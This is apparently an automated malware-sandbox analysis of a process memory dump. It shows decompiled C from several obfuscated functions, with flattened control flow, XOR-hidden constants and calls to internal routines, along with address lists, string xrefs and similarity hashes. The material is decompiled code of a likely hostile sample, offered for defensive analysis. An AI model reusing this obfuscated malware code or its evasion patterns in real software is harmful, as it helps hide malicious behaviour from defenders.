				_v80 = 0xe945;
				_v80 = _v80 / _t207;
				_v80 = _v80 ^ 0xcc46d226;
				_t208 = 0x62;
				_v80 = _v80 / _t208;
				_v80 = _v80 ^ 0x0215c355;
				_v48 = 0x42ef;
				_v48 = _v48 + 0xffff3840;
				_v48 = _v48 << 4;
				_v48 = _v48 ^ 0xfff789fd;
				_v72 = 0xbf2b;
				_v72 = _v72 | 0xc326a1c7;
				_t209 = 0x4b;
				_v72 = _v72 / _t209;
				_v72 = _v72 | 0xd12f9700;
				_v72 = _v72 ^ 0xd3bfbe8a;
				_v52 = 0xfa61;
				_v52 = _v52 << 3;
				_v52 = _v52 + 0x5488;
				_v52 = _v52 ^ 0x00084626;
				_v56 = 0xb5dc;
				_v56 = _v56 | 0x6ca6e5ac;
				_v56 = _v56 * 0x5e;
				_v56 = _v56 ^ 0xe54e28a7;
				_v76 = 0xbf9d;
				_v76 = _v76 + 0xdb7b;
				_v76 = _v76 + 0xffff5618;
				_v76 = _v76 | 0xc179f847;
				_v76 = _v76 ^ 0xc1798349;
				_v40 = 0xd8e6;
				_v40 = _v40 + 0x2ceb;
				_v40 = _v40 + 0x406a;
				_v40 = _v40 ^ 0x0001168e;
				_v68 = 0x1b9c;
				_t210 = 0x7a;
				_v68 = _v68 * 0x38;
				_v68 = _v68 + 0xa456;
				_v68 = _v68 >> 0xe;
				_v68 = _v68 ^ 0x00002836;
				_v44 = 0x7a08;
				_v44 = _v44 << 0xd;
				_v44 = _v44 / _t210;
				_v44 = _v44 ^ 0x00205e6a;
				while(_t181 != 0x12ef740) {
					if(_t181 == 0x13e246ff) {
						__eflags = _v16;
						_t186 =  &_v16;
						while(__eflags != 0) {
							_t177 =  *_t186;
							__eflags = _t177 - 0x30;
							if(_t177 < 0x30) {
								L11:
								__eflags = _t177 - 0x61;
								if(_t177 < 0x61) {
									L13:
									__eflags = _t177 - 0x41;
									if(_t177 < 0x41) {
										L15:
										 *_t186 = 0x58;
									} else {
										__eflags = _t177 - 0x5a;
										if(_t177 > 0x5a) {
											goto L15;
										}
									}
								} else {
									__eflags = _t177 - 0x7a;
									if(_t177 > 0x7a) {
										goto L13;
									}
								}
							} else {
								__eflags = _t177 - 0x39;
								if(_t177 > 0x39) {
									goto L11;
								}
							}
							_t186 = _t186 + 1;
							__eflags =  *_t186;
						}
						_t181 = 0x12ef740;
						continue;
					} else {
						if(_t181 == 0x15b39dc0) {
							_t181 = 0x3a71512f;
							continue;
						} else {
							if(_t181 != 0x3a71512f) {
								L19:
								__eflags = _t181 - 0x2b24b5a2;
								if(__eflags != 0) {
									continue;
								}
							} else {
								if(E0021602C(_v60,  &_v16,  &_v20, _v64) != 0) {
									_t181 = 0x13e246ff;
									continue;
								}
							}
						}
					}
					return _t178;
				}
				_push(0x22c030);
				_push(_v36);
				_t168 = E0022878F(_v28, _v32, __eflags);
				E002231E2(__eflags);
				_t143 =  &_v56; // 0x205e6a
				_t172 = E00226A65(_v48, __eflags,  &_v16, _v72, _a16, 0x40, _t168, _v52,  *_t143, _v76);
				__eflags = _t172;
				_t152 = _t172 > 0;
				__eflags = _t152;
				_t178 = 0 | _t152;
				E00222025(_v40, _t168, _v68, _v44);
				_t214 =  &(_t214[0xc]);
				_t181 = 0x2b24b5a2;
				goto L19;
			}

0x00222350
0x00222354
0x00222356
0x0022235a
0x0022235e
0x0022235f
0x00222360
0x00222365
0x0022236d
0x00222370
0x0022237a
0x00222382
0x00222384
0x0022238c
0x00222391
0x00222399
0x002223a1
0x002223a6
0x002223ae
0x002223b6
0x002223c4
0x002223c9
0x002223cf
0x002223d7
0x002223df
0x002223e3
0x002223eb
0x002223f8
0x002223fb
0x002223ff
0x00222407
0x0022240f
0x00222417
0x0022241f
0x0022242f
0x00222433
0x0022243f
0x00222444
0x0022244a
0x00222452
0x0022245a
0x00222462
0x00222467
0x0022246f
0x00222477
0x00222483
0x00222486
0x0022248a
0x00222492
0x0022249a
0x002224a2
0x002224a7
0x002224af
0x002224b7
0x002224bf
0x002224cc
0x002224d0
0x002224d8
0x002224e0
0x002224e8
0x002224f2
0x002224ff
0x0022250c
0x00222514
0x0022251c
0x00222524
0x0022252c
0x0022253b
0x0022253c
0x00222540
0x00222548
0x0022254d
0x00222555
0x0022255d
0x00222568
0x0022256c
0x00222574
0x0022257a
0x002225bb
0x002225c0
0x002225c4
0x002225c6
0x002225c8
0x002225ca
0x002225d0
0x002225d0
0x002225d2
0x002225d8
0x002225d8
0x002225da
0x002225e0
0x002225e0
0x002225dc
0x002225dc
0x002225de
0x00000000
0x00000000
0x002225de
0x002225d4
0x002225d4
0x002225d6
0x00000000
0x00000000
0x002225d6
0x002225cc
0x002225cc
0x002225ce
0x00000000
0x00000000
0x002225ce
0x002225e3
0x002225e4
0x002225e4
0x002225e9
0x00000000
0x0022257c
0x00222582
0x002225b4
0x00000000
0x00222584
0x0022258a
0x0022265e
0x0022265e
0x00222664
0x00000000
0x00000000
0x00222590
0x002225aa
0x002225b0
0x00000000
0x002225b0
0x002225aa
0x0022258a
0x00222582
0x00222673
0x00222673
0x002225ed
0x002225f2
0x002225fe
0x0022260d
0x0022261a
0x00222637
0x0022264c
0x0022264e
0x0022264e
0x0022264e
0x00222651
0x00222656
0x00222659
0x00000000

Strings

j^ , xrefs: 00222562
/Qq:, xrefs: 00222584
j^ , xrefs: 0022261A
, xrefs: 00222399
o, xrefs: 002223D7
/Qq:, xrefs: 002225B4
j@, xrefs: 0022251C
6(, xrefs: 0022254D
E, xrefs: 0022241F

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $/Qq:$/Qq:$6($E$j@$j^ $j^ $o
API String ID: 0-892457230
Opcode ID: dc112b412d2f46be3475d8372a0c119bc0bdeb0c4cd08b7fb0fe1fc71063a8a8
Instruction ID: b4c87afd4bb185da6ba36ad5b0a90ca160f2165457901061d19d6dcc24678bf2
Opcode Fuzzy Hash: dc112b412d2f46be3475d8372a0c119bc0bdeb0c4cd08b7fb0fe1fc71063a8a8
Instruction Fuzzy Hash: 78819771519341EFD768CF65D98651BBBE1BBC0B18F40890DF1819A2A0D7B6CA1ACF43

Uniqueness

Uniqueness Score: -1.00%

Function 10002D70, Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 108commemoryCOMMON

Download Yara Rule

APIs

SysAllocString.OLEAUT32(<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding="), ref: 10002D7F
CoCreateInstance.OLE32(1000D4B0,00000000,00000001,1000D4C0,?), ref: 10002DB0
PropVariantClear.OLE32(?), ref: 10002E75
SysFreeString.OLEAUT32(00000000), ref: 10002E7E
SysFreeString.OLEAUT32(00000000), ref: 10002E97

Strings

<xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding=", xrefs: 10002D77

Memory Dump Source

Source File: 00000007.00000002.2104680922.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000007.00000002.2104676360.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104690779.000000001000D000.00000002.00020000.sdmp Download File
Associated: 00000007.00000002.2104697302.0000000010012000.00000004.00020000.sdmp Download File
Associated: 00000007.00000002.2104705101.0000000010015000.00000002.00020000.sdmp Download File

Similarity

API ID: String$Free$AllocClearCreateInstancePropVariant
String ID: <xsl:stylesheet version="1.0" xmlns:xsl="http://www.w3.org/1999/XSL/Transform"><xsl:output method="text" version="1.0" encoding="
API String ID: 2501108336-1018649646
Opcode ID: 96621fcdecdd77bcd87e053180f01b167328e1e2a90fb6c4d0d6cfded311a5a7
Instruction ID: 0b0c17a62beb8f9cda8331f18031103c31f3880d59fc8f905040adcea8ba8702
Opcode Fuzzy Hash: 96621fcdecdd77bcd87e053180f01b167328e1e2a90fb6c4d0d6cfded311a5a7
Instruction Fuzzy Hash: D5417071D0022AAFDB00DBA4CC48ADEB7B8EF48754F114199F905EB254DB71DE01CBA0

Uniqueness

Uniqueness Score: -1.00%

Function 00229B45, Relevance: 10.3, Strings: 8, Instructions: 294
COMMONCrypto

Download Yara Rule

C-Code - Quality: 93%

			E00229B45(intOrPtr* __ecx, void* __edx, intOrPtr _a4, intOrPtr* _a8) {
				signed int* _v4;
				char _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				intOrPtr _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				unsigned int _v112;
				signed int _v116;
				void* _t241;
				intOrPtr _t259;
				void* _t260;
				intOrPtr _t268;
				intOrPtr _t269;
				intOrPtr _t270;
				intOrPtr _t274;
				intOrPtr* _t281;
				signed int _t283;
				void* _t315;
				intOrPtr* _t316;
				signed int _t317;
				signed int _t318;
				signed int _t319;
				signed int _t320;
				signed int _t321;
				signed int* _t322;
				signed int* _t325;
				void* _t327;

				_t281 = _a8;
				_push(_t281);
				_push(_a4);
				_t316 = __ecx;
				_push(__edx);
				_push(__ecx);
				E0021602B(_t241);
				_v76 = 0xd801;
				_t325 =  &(( &_v116)[4]);
				_v76 = _v76 >> 6;
				_t315 = 0;
				_t283 = 0xafaf7d2;
				_t317 = 6;
				_v76 = _v76 * 0x2a;
				_v76 = _v76 ^ 0x0000b202;
				_v80 = 0xa1a8;
				_v80 = _v80 | 0xe917477a;
				_v80 = _v80 << 2;
				_v80 = _v80 ^ 0xa45f8c0e;
				_v84 = 0x144b;
				_v84 = _v84 + 0xffffbc75;
				_v84 = _v84 * 0x6d;
				_v84 = _v84 ^ 0xffeb93ca;
				_v52 = 0x2e4b;
				_v52 = _v52 | 0x557249c0;
				_v52 = _v52 ^ 0x346b51fe;
				_v52 = _v52 ^ 0x611902e1;
				_v56 = 0xfad0;
				_v56 = _v56 + 0xffff1342;
				_v56 = _v56 ^ 0x8fd20197;
				_v56 = _v56 ^ 0x8fd21d65;
				_v96 = 0x8e39;
				_v96 = _v96 + 0xd833;
				_v96 = _v96 + 0xffffc0bd;
				_v96 = _v96 >> 0xa;
				_v96 = _v96 ^ 0x000036ba;
				_v12 = 0xb209;
				_v12 = _v12 ^ 0xf6f529e5;
				_v12 = _v12 ^ 0xf6f5ec43;
				_v64 = 0xc247;
				_v64 = _v64 + 0xffff53d4;
				_v64 = _v64 << 9;
				_v64 = _v64 ^ 0x002c2f20;
				_v100 = 0x41c0;
				_v100 = _v100 | 0x528356d8;
				_v100 = _v100 ^ 0x6d95e5a5;
				_v100 = _v100 >> 1;
				_v100 = _v100 ^ 0x1f8b2fe0;
				_v16 = 0x904b;
				_v16 = _v16 + 0x3d62;
				_v16 = _v16 ^ 0x0000a85c;
				_v68 = 0xf7e0;
				_v68 = _v68 | 0xcc3d0ce1;
				_v68 = _v68 >> 7;
				_v68 = _v68 ^ 0x01982b66;
				_v72 = 0x69a0;
				_v72 = _v72 / _t317;
				_v72 = _v72 ^ 0xd5ac5c66;
				_v72 = _v72 ^ 0xd5ac219b;
				_v20 = 0x9739;
				_v20 = _v20 << 2;
				_v20 = _v20 ^ 0x000260e8;
				_v24 = 0xc564;
				_t318 = 0x2c;
				_v24 = _v24 / _t318;
				_v24 = _v24 ^ 0x00005d30;
				_v88 = 0xe78a;
				_v88 = _v88 >> 1;
				_v88 = _v88 << 4;
				_v88 = _v88 ^ 0x00070feb;
				_v28 = 0x7421;
				_v28 = _v28 + 0xffff545c;
				_v28 = _v28 ^ 0xfffff127;
				_v32 = 0x3ef3;
				_t319 = 0x23;
				_v32 = _v32 * 0x1e;
				_v32 = _v32 ^ 0x00070388;
				_v36 = 0x1f6a;
				_v36 = _v36 << 0xa;
				_v36 = _v36 ^ 0x007d8833;
				_v104 = 0xc791;
				_v104 = _v104 + 0xffffa2ac;
				_v104 = _v104 * 0x2b;
				_v104 = _v104 + 0x587f;
				_v104 = _v104 ^ 0x00127594;
				_v40 = 0xa663;
				_v40 = _v40 + 0xffffc5d4;
				_v40 = _v40 ^ 0x00001ad7;
				_v44 = 0x2b76;
				_v44 = _v44 << 0xc;
				_v44 = _v44 ^ 0x02b774b0;
				_v92 = 0xa27;
				_v92 = _v92 / _t319;
				_v92 = _v92 + 0xffff3569;
				_v92 = _v92 ^ 0xffff2eae;
				_v108 = 0xf211;
				_t320 = 0x54;
				_v108 = _v108 / _t320;
				_v108 = _v108 >> 0xb;
				_v108 = _v108 | 0x89ac3126;
				_v108 = _v108 ^ 0x89ac4c52;
				_v112 = 0x8d71;
				_v112 = _v112 >> 0xa;
				_v112 = _v112 | 0xeb52e524;
				_v112 = _v112 >> 4;
				_v112 = _v112 ^ 0x0eb57242;
				_v48 = 0x270e;
				_v48 = _v48 | 0xda2d7f86;
				_v48 = _v48 ^ 0xda2d74b2;
				_v116 = 0xd303;
				_v116 = _v116 ^ 0x52d81e99;
				_t321 = 0x2e;
				_t322 = _v4;
				_v116 = _v116 / _t321;
				_v116 = _v116 * 0x47;
				_v116 = _v116 ^ 0x7fdf43a3;
				while(1) {
					_t258 = _v60;
					while(1) {
						L2:
						_t327 = _t283 - 0x1af8f879;
						if(_t327 <= 0) {
							break;
						}
						if(_t283 == 0x20f5637b) {
							_t259 =  *0x22ca20; // 0x0
							_t260 = E00221B49( &_v8, _v12, _t283,  *((intOrPtr*)(_t259 + 0x2c)), _t283, _v64, _v100);
							_t325 =  &(_t325[5]);
							if(_t260 == 0) {
								_t283 = 0x33905d8a;
								L26:
								if(_t283 == 0xc271ab7) {
									L30:
									return _t315;
								}
								while(1) {
									_t258 = _v60;
									goto L2;
								}
							}
							_t283 = 0x1af8f879;
							while(1) {
								_t258 = _v60;
								goto L2;
							}
						}
						if(_t283 == 0x28aacb6e) {
							if( *((intOrPtr*)(_t281 + 4)) < 0x74) {
								goto L30;
							}
							_t283 = 0x351bb9b3;
							continue;
						}
						if(_t283 == 0x33905d8a) {
							if(_t315 == 0) {
								E0021F536(_v52, _v56, _v96,  *_t316);
							}
							goto L30;
						}
						if(_t283 != 0x351bb9b3) {
							goto L26;
						}
						_t283 = 0xa3bf63c;
					}
					if(_t327 == 0) {
						E00222674(_v16, _v68, _t322,  *_t316, _v72, _v20, _t258);
						_t325 =  &(_t325[5]);
						_t283 = 0xc483d1b;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 == 0xa3bf63c) {
						 *((intOrPtr*)(_t316 + 4)) =  *((intOrPtr*)(_t281 + 4)) - 0x74;
						_push(_t283);
						_push(_t283);
						_t268 = E00218736( *((intOrPtr*)(_t316 + 4)));
						 *_t316 = _t268;
						if(_t268 == 0) {
							goto L30;
						}
						_t269 =  *_t281;
						_t283 = 0x20f5637b;
						_v4 = _t269;
						_t258 = _t269 + 0x74;
						_v60 = _t269 + 0x74;
						_t322 =  &_v116;
						goto L2;
					}
					if(_t283 == 0xafaf7d2) {
						_t283 = 0x28aacb6e;
						goto L2;
					}
					if(_t283 == 0xc483d1b) {
						_t270 =  *0x22ca20; // 0x0
						E002155D8(_v24, _v8, _t283, _t316 + 4, _v88,  *_t316, _v28, _v32, _v36,  *((intOrPtr*)(_t270 + 0x10)), _v104);
						_t325 =  &(_t325[0xa]);
						asm("sbb ecx, ecx");
						_t283 = (_t283 & 0xfff990e9) + 0x199ab82a;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 == 0x19944913) {
						_t274 =  *0x22ca20; // 0x0
						_push(_t283);
						_push(_t283);
						E0022838C(_v40, _v44, _v92, _v108, _t283, _v4, _v8,  *((intOrPtr*)(_t274 + 0x24)));
						_t325 =  &(_t325[8]);
						_t315 =  !=  ? 1 : _t315;
						_t283 = 0x199ab82a;
						while(1) {
							_t258 = _v60;
							goto L2;
						}
					}
					if(_t283 != 0x199ab82a) {
						goto L26;
					}
					_push(_t283);
					_push(_t283);
					E00215F43(_t283, _v8);
					_t283 = 0x33905d8a;
				}
			}

0x00229b49
0x00229b53
0x00229b54
0x00229b5b
0x00229b5d
0x00229b5e
0x00229b5f
0x00229b64
0x00229b6c
0x00229b6f
0x00229b7b
0x00229b7d
0x00229b84
0x00229b87
0x00229b8b
0x00229b93
0x00229b9b
0x00229ba3
0x00229ba8
0x00229bb0
0x00229bb8
0x00229bc5
0x00229bc9
0x00229bd1
0x00229bd9
0x00229be1
0x00229be9
0x00229bf1
0x00229bf9
0x00229c01
0x00229c09
0x00229c11
0x00229c19
0x00229c21
0x00229c29
0x00229c2e
0x00229c36
0x00229c3e
0x00229c46
0x00229c4e
0x00229c56
0x00229c5e
0x00229c63
0x00229c6b
0x00229c73
0x00229c7b
0x00229c83
0x00229c87
0x00229c8f
0x00229c97
0x00229c9f
0x00229ca7
0x00229caf
0x00229cb7
0x00229cbc
0x00229cc4
0x00229cd4
0x00229cd8
0x00229ce0
0x00229ce8
0x00229cf0
0x00229cf5
0x00229cfd
0x00229d09
0x00229d0c
0x00229d10
0x00229d18
0x00229d20
0x00229d26
0x00229d2b
0x00229d33
0x00229d3b
0x00229d43
0x00229d4b
0x00229d5a
0x00229d5d
0x00229d61
0x00229d69
0x00229d71
0x00229d76
0x00229d7e
0x00229d86
0x00229d93
0x00229d97
0x00229d9f
0x00229da7
0x00229daf
0x00229db7
0x00229dbf
0x00229dc7
0x00229dcc
0x00229dd4
0x00229de4
0x00229de8
0x00229df0
0x00229df8
0x00229e04
0x00229e09
0x00229e0f
0x00229e14
0x00229e1c
0x00229e24
0x00229e2c
0x00229e31
0x00229e39
0x00229e3e
0x00229e46
0x00229e4e
0x00229e56
0x00229e5e
0x00229e66
0x00229e72
0x00229e75
0x00229e7c
0x00229e85
0x00229e89
0x00229e91
0x00229e91
0x00229e95
0x00229e95
0x00229e95
0x00229e9b
0x00000000
0x00000000
0x0022a010
0x0022a04c
0x0022a064
0x0022a069
0x0022a06e
0x0022a07a
0x0022a07f
0x0022a085
0x0022a0a5
0x0022a0ae
0x0022a0ae
0x00229e91
0x00229e91
0x00000000
0x00229e91
0x00229e91
0x0022a070
0x00229e91
0x00229e91
0x00000000
0x00229e91
0x00229e91
0x0022a018
0x0022a038
0x00000000
0x00000000
0x0022a03a
0x00000000
0x0022a03a
0x0022a020
0x0022a08e
0x0022a09e
0x0022a0a4
0x00000000
0x0022a08e
0x0022a028
0x00000000
0x00000000
0x0022a02a
0x0022a02a
0x00229ea1
0x00229ff8
0x00229ffd
0x0022a000
0x00229e91
0x00229e91
0x00000000
0x00229e91
0x00229e91
0x00229ead
0x00229f9c
0x00229fab
0x00229fac
0x00229fb0
0x00229fb5
0x00229fbb
0x00000000
0x00000000
0x00229fc1
0x00229fc3
0x00229fcb
0x00229fd2
0x00229fd5
0x00229fd9
0x00000000
0x00229fd9
0x00229eb9
0x00229f8c
0x00000000
0x00229f8c
0x00229ec5
0x00229f42
0x00229f6f
0x00229f74
0x00229f79
0x00229f81
0x00229e91
0x00229e91
0x00000000
0x00229e91
0x00229e91
0x00229ecd
0x00229efb
0x00229f00
0x00229f01
0x00229f24
0x00229f2b
0x00229f31
0x00229f34
0x00229e91
0x00229e91
0x00000000
0x00229e91
0x00229e91
0x00229ed5
0x00000000
0x00000000
0x00229eeb
0x00229eec
0x00229eed
0x00229ef4
0x00229ef4

Strings

K., xrefs: 00229BD1
/,, xrefs: 00229C63
b=, xrefs: 00229C97
!t, xrefs: 00229D33
v+, xrefs: 00229DBF
$R, xrefs: 00229E31
0], xrefs: 00229D10
', xrefs: 00229DD4

Memory Dump Source

Source File: 00000007.00000002.2100903607.0000000000211000.00000020.00000001.sdmp, Offset: 00210000, based on PE: true

Associated: 00000007.00000002.2100899945.0000000000210000.00000004.00000001.sdmp Download File
Associated: 00000007.00000002.2100918840.000000000022C000.00000004.00000001.sdmp Download File

Yara matches

Similarity

API ID:
String ID: /,$!t$$R$'$0]$K.$b=$v+
API String ID: 0-2997250437
Opcode ID: 8e60af9c4a15786fb37f1d833790253bece924a86f740f3157c6d70c9af59641
Instruction ID: 07f09243d584471723b22d5f080308e5037782474e6da576bf1d8b5d03820f04
Opcode Fuzzy Hash: 8e60af9c4a15786fb37f1d833790253bece924a86f740f3157c6d70c9af59641
Instruction Fuzzy Hash: A9D154710183409FE368CF65D88991FBBE1FB84708F208A1DF596866A0D7B9CA59CF43

Uniqueness

Uniqueness Score: -1.00%

Function 002212E2, Relevance: 10.2, Strings: 8, Instructions: 239
COMMONCrypto

Download Yara Rule

C-Code - Quality: 95%

			E002212E2() {
				char _v520;
				char _v1040;
				signed int _v1044;
				signed int _v1048;
				intOrPtr _v1052;
				intOrPtr _v1056;
				signed int _v1060;
				signed int _v1064;
				signed int _v1068;
				signed int _v1072;
				signed int _v1076;
				signed int _v1080;
				signed int _v1084;
				signed int _v1088;
				signed int _v1092;
				signed int _v1096;
				signed int _v1100;
				signed int _v1104;
				signed int _v1108;
				signed int _v1112;
				unsigned int _v1116;
				signed int _v1120;
				signed int _v1124;
				signed int _v1128;
				signed int _v1132;
				signed int _v1136;
				signed int _v1140;
				signed int _v1144;
				signed int _v1148;
				short* _t246;
				intOrPtr _t256;
				void* _t257;
				void* _t261;
				void* _t271;
				intOrPtr _t293;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t306;

				_t306 =  &_v1148;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_t261 = 0x1f2b77a6;
				_v1056 = 0x1c0398;
				_v1052 = 0x1a4c8e;
				_v1080 = 0xed6b;
				_v1080 = _v1080 + 0xffffb43c;
				_v1080 = _v1080 ^ 0x000092bf;
				_v1104 = 0xc4aa;
				_v1104 = _v1104 * 0x6d;
				_t297 = 0x23;
				_v1104 = _v1104 / _t297;
				_v1104 = _v1104 ^ 0x00022488;
				_v1112 = 0xb9;
				_v1112 = _v1112 + 0xffff6145;
				_v1112 = _v1112 + 0xc51a;
				_v1112 = _v1112 ^ 0x0000206d;
				_v1132 = 0x8b7;
				_v1132 = _v1132 + 0xffff38b6;
				_v1132 = _v1132 ^ 0xb2a0a749;
				_t298 = 0x57;
				_v1132 = _v1132 / _t298;
				_v1132 = _v1132 ^ 0x00e3f1cf;
				_v1084 = 0x5f6a;
				_v1084 = _v1084 << 0xa;
				_v1084 = _v1084 ^ 0x017dcd17;
				_v1108 = 0xc835;
				_v1108 = _v1108 >> 0xd;
				_t51 =  &_v1108; // 0xd
				_t299 = 3;
				_v1108 =  *_t51 * 7;
				_v1108 = _v1108 ^ 0x00005049;
				_v1100 = 0x845e;
				_v1100 = _v1100 + 0x74c1;
				_v1100 = _v1100 << 3;
				_v1100 = _v1100 ^ 0x0007b300;
				_v1116 = 0xc35d;
				_v1116 = _v1116 * 0x33;
				_v1116 = _v1116 >> 9;
				_v1116 = _v1116 ^ 0x000042ed;
				_v1120 = 0x8ea6;
				_v1120 = _v1120 >> 2;
				_v1120 = _v1120 | 0xab635639;
				_v1120 = _v1120 ^ 0xab63670d;
				_v1092 = 0x4c03;
				_v1092 = _v1092 | 0x601fb915;
				_v1092 = _v1092 ^ 0x04845a80;
				_v1092 = _v1092 ^ 0x649be272;
				_v1076 = 0x4c13;
				_v1076 = _v1076 * 0x2c;
				_v1076 = _v1076 ^ 0x000d0b59;
				_v1068 = 0x8d71;
				_v1068 = _v1068 / _t299;
				_v1068 = _v1068 ^ 0x0000326e;
				_v1064 = 0xd7a3;
				_v1064 = _v1064 >> 0xd;
				_v1064 = _v1064 ^ 0x00005df9;
				_v1060 = 0xed2b;
				_v1060 = _v1060 ^ 0x64d9e662;
				_v1060 = _v1060 ^ 0x64d941f5;
				_v1148 = 0x8835;
				_v1148 = _v1148 + 0xffffd4eb;
				_t300 = 0x61;
				_v1148 = _v1148 * 0x34;
				_v1148 = _v1148 + 0x9f16;
				_v1148 = _v1148 ^ 0x0013bc95;
				_v1140 = 0x3032;
				_v1140 = _v1140 / _t300;
				_v1140 = _v1140 | 0x38ef646c;
				_t125 =  &_v1140; // 0x38ef646c
				_t301 = 0x36;
				_v1140 =  *_t125 / _t301;
				_v1140 = _v1140 ^ 0x010de54d;
				_v1124 = 0xc110;
				_v1124 = _v1124 << 7;
				_t302 = 0x3f;
				_v1124 = _v1124 / _t302;
				_v1124 = _v1124 ^ 0x00019318;
				_v1136 = 0x6a8;
				_v1136 = _v1136 ^ 0x800f5fd5;
				_v1136 = _v1136 ^ 0x17dc092f;
				_t303 = 0x37;
				_v1136 = _v1136 * 0x45;
				_v1136 = _v1136 ^ 0xebf4d978;
				_v1144 = 0x9345;
				_v1144 = _v1144 | 0xef963ffb;
				_v1144 = _v1144 / _t303;
				_v1144 = _v1144 ^ 0x045b7df9;
				_v1128 = 0xf550;
				_v1128 = _v1128 + 0xffff8b4b;
				_v1128 = _v1128 >> 1;
				_v1128 = _v1128 >> 8;
				_v1128 = _v1128 ^ 0x00000cb5;
				_v1072 = 0xd52f;
				_v1072 = _v1072 ^ 0xc146d284;
				_v1072 = _v1072 ^ 0xc146011a;
				_v1088 = 0xae87;
				_v1088 = _v1088 | 0xff36597f;
				_v1088 = _v1088 ^ 0xff36d7e8;
				_v1096 = 0xe081;
				_v1096 = _v1096 ^ 0xf8f61e03;
				_v1096 = _v1096 + 0xffff4bc3;
				_v1096 = _v1096 ^ 0xf8f624ac;
				do {
					while(_t261 != 0xe2b4321) {
						if(_t261 == 0x123adc07) {
							E0021B75F();
							_t261 = 0x38f4cd20;
							continue;
						}
						if(_t261 == 0x15946a4d) {
							_t246 = E002128CE( &_v520, _v1128, _v1072);
							__eflags = 0;
							 *_t246 = 0;
							return E00215AEA(_v1088, _v1096,  &_v520);
						}
						if(_t261 == 0x1dde1df8) {
							_push(_t261);
							E0022A889(_v1068, _v1064,  &_v1040);
							E00212BDD(_v1068,  &_v1040, _v1060, _v1148,  &_v1040, _v1140, _v1124);
							_t212 =  &_v1136; // 0xd
							_push( &_v1040);
							_push( &_v520);
							E00217B63( *_t212, _v1144, __eflags);
							_t306 =  &(_t306[0xa]);
							_t261 = 0x15946a4d;
							continue;
						}
						if(_t261 == 0x1f2b77a6) {
							_t256 =  *0x22ca2c; // 0x558300
							__eflags =  *((intOrPtr*)(_t256 + 0x224));
							_t261 =  !=  ? 0xe2b4321 : 0x123adc07;
							continue;
						}
						_t313 = _t261 - 0x38f4cd20;
						if(_t261 != 0x38f4cd20) {
							goto L12;
						}
						_push(_v1132);
						_t257 = E0022889D(0x22c9b0, _v1112, _t313);
						_pop(_t271);
						_t193 =  &_v1116; // 0xd
						_t293 =  *0x22ca2c; // 0x558300
						_t197 = _t293 + 0x230; // 0x680053
						E0021C680(_t197, _v1108, _v1100, _t271,  *_t193,  *0x22ca2c, _t257,  &_v520);
						_t256 = E00222025(_v1120, _t257, _v1092, _v1076);
						_t306 =  &(_t306[9]);
						_t261 = 0x1dde1df8;
					}
					E002263C1();
					_t261 = 0x38f4cd20;
					L12:
					__eflags = _t261 - 0x3a4044d2;
				} while (__eflags != 0);
				return _t256;
			}

0x002212e2
0x002212e8
0x002212ef
0x002212f4
0x002212f9
0x00221301
0x00221309
0x00221311
0x00221319
0x00221321
0x00221332
0x0022133c
0x00221341
0x00221347
0x0022134f
0x00221357
0x0022135f
0x00221367
0x0022136f
0x00221377
0x0022137f
0x0022138b
0x00221390
0x00221396
0x0022139e
0x002213a6
0x002213ab
0x002213b3
0x002213bb
0x002213c0
0x002213c5
0x002213c6
0x002213ca
0x002213d2
0x002213da
0x002213e2
0x002213e7
0x002213ef
0x002213fc
0x00221400
0x00221405
0x0022140d
0x00221415
0x0022141a
0x00221422
0x0022142a
0x00221432
0x0022143a
0x00221442
0x0022144a
0x00221457
0x0022145b
0x00221463
0x00221471
0x00221475
0x0022147d
0x00221485
0x0022148a
0x00221492
0x0022149a
0x002214a2
0x002214aa
0x002214b2
0x002214c3
0x002214d0
0x002214d9
0x002214e1
0x002214e9
0x002214f9
0x002214fd
0x00221505
0x00221509
0x0022150e
0x00221514
0x0022151c
0x00221524
0x0022152d
0x00221532
0x00221538
0x00221540
0x00221548
0x00221550
0x0022155d
0x0022155e
0x00221562
0x0022156a
0x00221572
0x00221580
0x00221584
0x0022158c
0x00221594
0x0022159c
0x002215a0
0x002215a5
0x002215ad
0x002215b5
0x002215bd
0x002215c5
0x002215cd
0x002215d5
0x002215dd
0x002215e5
0x002215ed
0x002215f5
0x002215fd
0x002215fd
0x00221607
0x00221713
0x00221718
0x00000000
0x00221718
0x00221613
0x00221747
0x00221750
0x00221752
0x00000000
0x00221767
0x0022161f
0x002216b9
0x002216bf
0x002216e0
0x002216f0
0x002216f4
0x002216fc
0x002216fd
0x00221702
0x00221705
0x00000000
0x00221705
0x0022162b
0x0022169b
0x002216a2
0x002216a9
0x00000000
0x002216a9
0x0022162d
0x0022162f
0x00000000
0x00000000
0x00221635
0x00221642
0x00221647
0x00221659
0x00221666
0x00221670
0x00221676
0x00221689
0x0022168e
0x00221691
0x00221691
0x00221723
0x00221728
0x0022172a
0x0022172a
0x0022172a
0x00000000

Strings

+, xrefs: 00221492
k, xrefs: 00221309
B, xrefs: 00221405
IP, xrefs: 002213CA
n2, xrefs: 00221475
j_, xrefs: 0022139E
ld8, xrefs: 00221505
